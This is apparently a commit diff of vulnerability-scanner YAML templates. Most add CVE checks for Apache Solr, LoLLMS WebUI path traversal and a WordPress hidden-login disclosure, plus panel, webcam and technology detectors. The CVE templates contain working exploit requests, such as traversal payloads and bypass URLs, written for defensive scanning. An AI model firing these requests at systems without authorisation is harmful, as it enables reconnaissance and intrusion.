- raw:
- |
GET /solr/admin/info/properties:/admin/info/key HTTP/1.1
Host: {{Hostname}}
SolrAuth: {{to_lower(rand_text_alpha(5))}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "responseHeader"
- "system.properties"
- "solr.script"
- "solr.solr.home"
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a004630440220686c4dc5a7404e068801bbf4a05feb2a6b42c4aa0447a3c98d2260a28401c0bd02207019e32df34b848766b71256f8a8819b5b405d110e92cb54886118b69f7dcfbe:922c64590222798bb761d5b6d8e72950

63
http/cves/2024/CVE-2024-4841.yaml Normal file
View File

@ -0,0 +1,63 @@
id: CVE-2024-4841
info:
name: LoLLMS WebUI - Subfolder Prediction via Path Traversal
author: s4e-io
severity: medium
description: |
A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest.
impact: |
By exploiting this vulnerability, an attacker can predict the folders, subfolders, and files present on the victim's computer. The vulnerability is present in the way the application handles the 'path' parameter in HTTP requests to the '/add_reference_to_local_model' endpoint.
reference:
- https://huntr.com/bounties/740dda3e-7104-4ccf-9ac4-8870e4d6d602
- https://nvd.nist.gov/vuln/detail/CVE-2024-4841
classification:
cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4
cve-id: CVE-2024-4841
cwe-id: CWE-29
epss-score: 0.00043
epss-percentile: 0.09834
metadata:
max-request: 1
fofa-query: "LoLLMS WebUI - Welcome"
tags: cve,cve2024,lollms-webui,traversal
variables:
folder: "{{to_upper(rand_text_alpha(10))}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /add_reference_to_local_model HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"path":"\\Users"}
matchers:
- type: dsl
dsl:
- 'contains(body, "{\"status\":true}")'
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
- raw:
- |
POST /add_reference_to_local_model HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"path":"\\{{folder}}"}
matchers:
- type: dsl
dsl:
- 'contains(body, "{\"status\":false,\"error\":\"Model not found\"}")'
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502204f4c2aacf87ed18aff38311690978c406fb6a1dc23e5f457678f31d955b3a280022100e3b93ae82571b2d42991d9119cae66f5053c2dd8bfa8b52b705b1bb8a3ee306b:922c64590222798bb761d5b6d8e72950

62
http/cves/2024/CVE-2024-6420.yaml Normal file
View File

@ -0,0 +1,62 @@
id: CVE-2024-6420
info:
name: Hide My WP Ghost < 5.2.02 - Hidden Login Page Disclosure
author: jpg0mez
severity: high
description: |
The Hide My WP Ghost plugin does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
remediation: Fixed in 5.2.02
reference:
- https://wpscan.com/vulnerability/dfda6577-81aa-4397-a2d6-1d736f9ebd44/
- https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms/
- https://nvd.nist.gov/vuln/detail/CVE-2024-6420
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cvss-score: 8.6
cve-id: CVE-2024-6420
epss-score: 0.00043
epss-percentile: 0.09914
metadata:
verified: true
max-request: 2
framework: wordpress
fofa-query: body="/wp-content/plugins/hide-my-wp"
publicwww-query: "/wp-content/plugins/hide-my-wp/"
tags: cve,cve2024,bypass,wp,wp-plugin,wpscan,wordpress,hide-my-wp
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/hide-my-wp")'
- 'status_code == 200'
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/?gf_page=randomstring"
matchers-condition: and
matchers:
- type: dsl
dsl:
- "!contains(tolower(location), 'wp-login.php')"
- type: word
part: header
words:
- '%2F%3Fgf_page%3Drandomstring&reauth=1'
extractors:
- type: kval
kval:
- location
# digest: 4b0a00483046022100a0b13d185f443723c7e88f0dd3e31617978792e99fc4c83da014daaa337f9877022100c831aab59bcd0ca39f4a7e840ac9e2bb2b416da2935d7bd4d4acafb0621946b2:922c64590222798bb761d5b6d8e72950

4
http/cves/2024/CVE-2024-7928.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2024-7928
info:
name: FastAdmin < V1.3.4.20220530 - Path Traversal
author: s4e-io
author: s4e-io,Hel10-Web
severity: medium
description: |
A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.
@ -48,4 +48,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502206a03af2bd622586d9ea3423ce05fb8c99fe1ec1940335aca969aece8642d4cf9022100e4fa51cfa54ae2d026551a9ff270d3e4c5e52c4645e364558c90b77f36d71458:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220385c532d368b3808a915a79463997ddb6ff8018a20199b4998af4174f576745c022100f711195a605eb802382565dc482c781c169d00258730209652591d41dee479ec:922c64590222798bb761d5b6d8e72950

36
http/exposed-panels/cyberpanel-panel.yaml Normal file
View File

@ -0,0 +1,36 @@
id: cyberpanel-panel
info:
name: Cyberpanel Login Panel - Detect
author: mailler
severity: info
description: |
Cyberpanel login panel was detected.
reference:
- https://cyberpanel.net/KnowledgeBase/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata:
max-request: 1
shodan-query: html:"cyberpanel"
fofa-query: app="Cyberpanel"
product: cyberpanel
tags: cyberpanel,panel,login,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "<title>(.*)CyberPanel(.*)</title>"
- type: status
status:
- 200
# digest: 4a0a004730450221008907aa96c27405c826857b7ef745657707e1e19fbd3ba3dd43a39f946de135a202207caab45a1862b88cf7a747d3dfd54d12af83fe04ab50dac000e131e30c833372:922c64590222798bb761d5b6d8e72950

28
http/exposed-panels/quivr-panel.yaml Normal file
View File

@ -0,0 +1,28 @@
id: quivr-panel
info:
name: Quivr Panel - Detect
author: s4e-io
severity: info
description: |
Quivr panel was discovered.
reference:
- https://github.com/QuivrHQ/quivr
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="848114197"
tags: panel,login,quivr,detect
http:
- method: GET
path:
- "{{BaseURL}}/login"
matchers:
- type: dsl
dsl:
- 'contains_any(body, "<title>Quivr - Get a Second Brain", "data-sentry-component=\"QuivrLogo\"")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502202e8eac84bfdc975779f3da9230f56f83b71d7b759680e7980c8f2e9a92f7f9bf02210094cb04c2138934c3c51cefe1ee16376b4de75eb73ed1e4f568df35f99abd334c:922c64590222798bb761d5b6d8e72950

27
http/iot/ip-webcam.yaml Normal file
View File

@ -0,0 +1,27 @@
id: ip-webcam
info:
name: IP Webcam Viewer Page - Detect
author: gy741
severity: low
description: |
Searches for exposed webcams by querying the endpoint and the existence of IP Webcam in the body.
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-601917817
tags: webcam,iot,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: body
words:
- '<title>IP Webcam</title>'
- 'Pavel Khlebovich'
condition: and
# digest: 4b0a00483046022100e5996146b860677c6e4521de9ad42095cecdbd62519c9ea877440a065092d859022100eb1341d93797ad203e767e9b2730b75eeda5e8d7fb83382c7e726710036c043e:922c64590222798bb761d5b6d8e72950

25
http/miscellaneous/azure-blob-core-detect.yaml Normal file
View File

@ -0,0 +1,25 @@
id: azure-blob-core-detect
info:
name: Azure Blob Core Service - Detect
author: ProjectDiscoveryAI
severity: info
description: |
This template detects the presence of 'blob.core.windows.net' in the response body, indicating potential references to Azure Blob Storage.
metadata:
max-request: 1
verified: true
shodan-query: html:"blob.core.windows.net"
tags: azur,blob,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: response
words:
- "blob.core.windows.net"
# digest: 4a0a00473045022006936d241ffe12fbdc24fb7b8a5ddf0350b5d89186e9652c2b1349cf5bef957c0221008ab50b8b01f5974e0f7f67f5730e16f0df2ffd135509bd3de13a366cbaa904d6:922c64590222798bb761d5b6d8e72950

27
http/misconfiguration/thanos-prometheus-exposure.yaml
View File

@ -2,11 +2,16 @@ id: thanos-prometheus-exposure
info:
name: Thanos Prometheus Setup - Exposure
author: DhiyaneshDk
author: DhiyaneshDk,righettod
severity: high
description: |
Thanos graph endpoint was detected.
reference:
- https://thanos.io/
- https://github.com/thanos-io/thanos
metadata:
verified: true
max-request: 1
max-request: 2
shodan-query: title:"Thanos | Highly available Prometheus setup"
fofa-query: icon_hash="29632872"
tags: thanos,prometheus,exposure,setup,misconfig
@ -15,17 +20,13 @@ http:
- method: GET
path:
- "{{BaseURL}}/graph"
- "{{BaseURL}}/classic/graph"
matchers-condition: and
stop-at-first-match: true
matchers:
- type: word
words:
- "THANOS_COMPONENT"
- "THANOS_QUERY_URL"
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "THANOS_COMPONENT", "THANOS_QUERY_URL") || contains_all(body, "<title>Thanos", "href=\"/classic/\">Thanos</a>")'
condition: and
part: body
- type: status
status:
- 200
# digest: 4a0a00473045022100d9e1e7479593315b55f53fd69afbc820f042cce7a4a60701e873063a1ff59ac0022000ce3370054049d410c3c2e5bf66ae61582e6d5e1255ab4808a62e399d219a3e:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100f8f26aad83b4b0162f73962102847bd51cda6dcb0cb3385b26ce3b0e716cadea022100c63e4a1a2e541904ddd90bff7e095310d93972002ff7952f62c8acc6fd615eb6:922c64590222798bb761d5b6d8e72950

7
http/technologies/favicon-detect.yaml
View File

@ -3781,8 +3781,13 @@ http:
dsl:
- "status_code==200 && (\"1857752096\" == mmh3(base64_py(body)))"
- type: dsl
name: "ip-webcam"
dsl:
- "status_code==200 && (\"-601917817\" == mmh3(base64_py(body)))"
extractors:
- type: dsl
dsl:
- 'mmh3(base64_py(body))'
# digest: 4a0a0047304502200908529273d4bbc48bd1193bca5e97038f56bb88a937f8f0ba9fccba5fa06a78022100b2265e15f2fd199166d137855ffe2835957bebc158eb8007eb322d77fca12b2f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022063790a3b80cf985f1f3386b1b5f5fe412c9f29729f1d2ea319d238f0185084a9022100900b177b1c451c6b0e0383767e9e0f7bf6057f53615495cdb0bb439a342215fe:922c64590222798bb761d5b6d8e72950

30
http/technologies/hubble-detect.yaml Normal file
View File

@ -0,0 +1,30 @@
id: hubble-detect
info:
name: Hubble - Detect
author: righettod
severity: info
description: |
Hubble products was detected.
reference:
- https://github.com/cilium/hubble
- https://docs.cilium.io/en/stable/observability/hubble/
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Hubble UI"
tags: tech,hubble,detect
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "<title>hubble ui enterprise", "<title>hubble ui")'
condition: and
# digest: 4a0a00473045022100e506c503ed78af724c35c6b799995acf62a494a03a57211004bfc0b4890ce5c502206dbc547ac892aba8055fc5215264ebaa67c08309ab3ba20f3a1c7684691d1d6c:922c64590222798bb761d5b6d8e72950

33
http/technologies/localai-detect.yaml Normal file
View File

@ -0,0 +1,33 @@
id: localai-detect
info:
name: LocalAI - Detect
author: s4e-io
severity: info
description: |
An instance running LocalAI was detected.
reference:
- https://github.com/mudler/LocalAI
- https://localai.io/
metadata:
verified: true
max-request: 1
vendor: mudler
product: localai
fofa-query: "LocalAI API"
shodan-query: http.favicon.hash:-976853304
tags: localai,tech,detect
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
matchers:
- type: dsl
dsl:
- 'contains_all(body, "alt=\"LocalAI Logo\"", "<title>LocalAI")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450221009a2d4b221f08c88e0eb9320a33e2be06efb24d9f4764e7fbea6d508bb1d801ca02206f43d083b6202fe6e065c01f47cb46854ed27a37488b44a11c52fa830bf4e74a:922c64590222798bb761d5b6d8e72950

29
http/technologies/pghero-detect.yaml Normal file
View File

@ -0,0 +1,29 @@
id: pghero-detect
info:
name: PgHero - Detect
author: righettod
severity: info
description: |
PgHero products was detected.
reference:
- https://github.com/ankane/pghero
metadata:
verified: true
max-request: 1
shodan-query: http.title:"PgHero"
tags: tech,pghero,detect
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(to_lower(body), "<title>pghero", "/assets/pghero/", ">pghero</a>")'
condition: and
# digest: 4a0a00473045022009d92fd71a4e9a2aed02cffdcf3080aba8948f91890f4704c8a66b72e9dec584022100d5823d5325286af0d924fb1d3458589290a966e434c16769a71d3f2ed461335b:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/ad-inserter.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402207e579d3bf146793986ce1a614b2845dad63213aa61909dda263a8c9f374568d4022076a1d66940381d23f9923f2eee8c5fd9d184d2e87e0c31ce63de9490d236918e:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/add-to-any.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022078bb2cde6119145568ed297ad482ae6a5119ab1ee6795971a51a193fb88ec0150220720d120f63bfd04954da0d88598d2daba540fa929e6b06e423b200ca63493d2a:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/admin-menu-editor.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402203d9bded756c85bbbae99c5be599829af055119a9afe898b13c47d7c5825d686302203428bdc0646af8cf1d6fcc589c2de151671e9cac58deb71df0ccc6ca64d28ecf:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/advanced-custom-fields.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402202909d4be5ca55edb70e88e873cd453842402d7d0729b1223b47dcbdfc33ddd650220354d5616e0cf381f2aebab1ec36725a3938d1137c6b388021b1b2b7e8fe79c2a:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/akismet.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502203fba70148a94e55a6dc8a3d9382c0ece460d5f9f41cd88d5087422fe7218369a022100a05e77073200ed90b3f89f74e49572f531c0a8ffc8ad61e68de122c518af961e:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220442c4706420276ce4cb5d7cd067f83ade184e69d8c0d2036a4aa3bb0b14182eb02203f94e2dca686dd1a7f0d3f900b0b80b5c277a75a52f2506ef59689eadd61202d:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100be5c6983d5e4eb980d86eef9ac7be6e90fcdb921ce8c2d27fb7f484bd327229e022100ac59b2fd2d6eb23f739b7408e351baff980a4fb79c1f37b31bb079980ba6ede7:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220758487600b9878a9044fd75fcf9eaafd4e26a4b9e452a444be1712eb24253a5d022100a7565f5a66ca12d436a4ee9c376957e033f7dd74d1fc83d9d1a495e304464781:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/amp.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100be0d25935ae24a5c8e9670f40672cd0324f9cf0d0f792e6be855363fcaf80121022100b8e1c6a095a0f5fec3b3b5c564b9962a0947c531af52b3e5ae094b1173a0b753:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/antispam-bee.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100d9d941b18d4f66d4537a0a0436d5e24c1595845d11a60cb5eee99bf70f4dda3402200eee1405b055c7759177fce468292d13e42014ff969b694c9a7b7b67774e36a1:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/astra-sites.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100d792d64868e7467d4099791651a5b96d10df91ff7e187f26abba2812414f6eff0221008dbe9548053a29094b019156d02c3978788869917eaf4b2dd97cfaf22651d919:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/autoptimize.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022030019080f257199760c959f228a578b0db01744dc6608d04cb921766df3c8655022078269944440481eda5083f6c5b33b65becc4e93ae47793ad96584419a003028f:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/backwpup.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100826c19e49503df777905d74089e152f70dbcd9bb02da81f5dcc77daa90f49050022030430e88781a4781aa34d5ca7901b6a605e1826a6c5e9f67719a567b0263d232:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/better-search-replace.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100d8c70904955f8ca8f22c3d0859c6b7acbd8a37439cd2e40036b60eace5bec4e2022042ec79f7ed3dd9d0f5ac3c08e67a574b546921977795cf5a15adb626d7669d59:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/better-wp-security.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022023d0575dfa8a8eb54def6ad16d2f3ce189f0da506d0afcc4e50dec9b53e2b7ef02210087ab33f5c440fbf5cce907e640a410662bc666c19c1ce87078e42c77a033cc95:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100e897afbfbd000f78c09999d87ac999ac8a8eb65ce9a24b68a1eef745a50593c30220151cbd8336ab366bf8128fda6cd63484684a2bdd5fe73e3c33965f2ea98c9aa4:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022077d7e936943a85cbef7e697cd46180569adb3231fb291c9492903a56609cfd5f02206c0dc4e7491beaa34f84e3ea7ec0571b448265b2880e2110f1f307f7d2e9c3f6:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/breeze.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220478b4dfd048096e72ec81623a3ec06e5f53789f0a479c144fded068fd95c317102203951a547f32ed0714c4fb6e4f60163b5ab798f88a6bd2116cc86c753be67ed2d:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/broken-link-checker.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100b253c0a231b30bf16e4c846012cfc39f2c804099bf70599953fcdb949a1ca0c4022100aeccecafac14a0954666417c45130fa12d57c53ba2f454428f533356a9e346cc:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/chaty.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100894db27207c46fa8f2d62826dacc92a4ff36b1c61ee3d99be6b768f150de1b58022054a49f04fe86ad5c7267ff9313032ead6ae6a4ad6e6d5a168aa2376b6e65a7c7:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/child-theme-configurator.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022035db143bb6a54a758d45ed561b9a110b01b6bb0d911f89095c782734d0f5369602204423026b2539275b030bf08d45091335f1c0b9a4ffb1c3a2794320ba55bfae24:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/classic-editor.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022065811e00faab1dc733f65e031ce9326dd81bba75676323b39df36ed4966477620221009bb95ef07b17d757adcfc22995b0a505a8abd80841957c2457349ad0c00dab4f:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/classic-widgets.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100c6690a70e85faae20dfb3c22ceb15cc1759f4d21cb06c1d3c3342eb306b676a5022073fdfa81aca6a92892b6f2354d49cd7ac3481bee8222a107c77a2aee405d8f4d:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022003e6fd06e39d1b0eb64c55042b27db351ba107d7ca403294da3eaf86c98b7ab702203265c5a7ac4bc9882cc2f555ee1b55bc2d83faf433cd3de429670bfa9504bf9e:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/cmb2.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402202f2ce60516e7f5344e139da66453eeac1dd487a8e693db0abf599de6d3252dc4022071a5b3599ea84257f8dd3ada74706ef4c0302f6f2ead65f25cb43552d7389f4c:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/coblocks.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100830438c6ca366bfd07e7c172ea0140d132e533303b8c81ba0e53a788683671d002201d8ce9e4c213c2bae3a28894e9beb33a1ee12e72f5fd92f46a7727baf64a758a:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/code-snippets.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022054e92e25c9ccc8f0a07e44f95f2097a053eadaeb5c3677423190ba0ccda493b7022100c3b9218000341effc7ff77e9e222ba11f4be18b1da0748bcdac48b81aab4e3c0:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/coming-soon.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100a5d7335d6685d1a2d8bafa4258e37ecdcca870d5f1252e22b443e9c90899317702205b76da7912eb7a318baf6ee88a931e76e8d6dd85d6527b73cfe6515338178481:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/complianz-gdpr.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100a11e3c69a67d779c68460f21bdbbf6b99f3af075cc6c5a3992bda6be1660051e02206531f4e15019946a02d0d9690c57ca8efea83d3e5c29789b3752d3dc8c915586:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100d618a1250d75cf3df074c806580622baf25e9ea51c5523996fd554761130c477022100da0e117c3d3f229ab1eb5a4bceff7481a4296d3aa70df48c3963ed59b6404a4a:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/contact-form-7.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022058d588e6a99f8be5f8bfe74b2666b028833ffc623e96dad92d189ca813466590022100a2ef612d973f97fea7a15c7d2f9d3e64975cafc54c3861531874bfbcad6347b2:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100c2956387ac87ce8d7b62167d3912a625680266d14834b27dc7d90e87cd79c132022011b053a5a1c9974d7f2764850e4e66a6a775c64c1f3e1e2d2339db2fee860bca:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/cookie-law-info.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100be2c6ee9866f503f89c932e3671a87d5066ed4fabfad643da6bd0d7529eba0be022074fe2b6e6f3d28fda1d301816d5ca516db16078e6cfffe646b7a46809717f7d4:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/cookie-notice.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502203c7662052305399d5c70591b32ef0ac18dc24ee01e025e7fd31331ce9ee47c15022100810765f31d67309949fbe5ea589d2530fcf291c9269648978231f0d32061f3b2:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/copy-delete-posts.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402204d84b4a49890a7b45f936e76cf886f4a181a4cecf937656c81885a8ee57551850220603ac8b74d54715d65082b4802ddef59d2ba71bf4c2e8f58028a3d156a3da827:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402206d81fbfb995872f999cb1ad7de3c815be5b4c6f4bd5662bad5886b244a200811022023b60d90f9cfb711c1db2447e6573b16d512e94efaf77a1a93ef9a86b87bf71f:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502207c8abad4d1c7ef15f08cdba5345ff72f5280600120e0435171718937eb46b5a7022100e13e06b1b0fd04a62fdfb55f7b554c0efb7680b6d876852584f2fddf8d9aaf35:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/custom-css-js.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402205e863310686703afd5c7ebbee2acfd7a95f1a82efbf19e878a1adc7a6d43b9fb0220101b8e0f62c5612896fd2610147920d6be221349660a9914efa46883b900cd0b:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/custom-fonts.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100f9c2f5faae7edfc45af1d461382056a7584330a63157b3092b1e14c3123a6c44022003851ada8be8144eae8c8af450a2532555d41b6989fc1801948167c783400e64:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/custom-post-type-ui.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502205c8d47be92257a4ec62f273c7db194a9faf93052a1e0f13bf274615adaefcb57022100b6622e0d9317775820605676f2a82e22fc19ad59cee2efc07edea879259aae93:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/disable-comments.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022017903ab3d10e96d5d91900e5f6271a2f43ceaaf93ca8084aea44106b7888ba6302203b462a0d692ca2b6a597db36e73f677efd64f89fc048c3d147294ad9e9eea1ed:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/disable-gutenberg.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
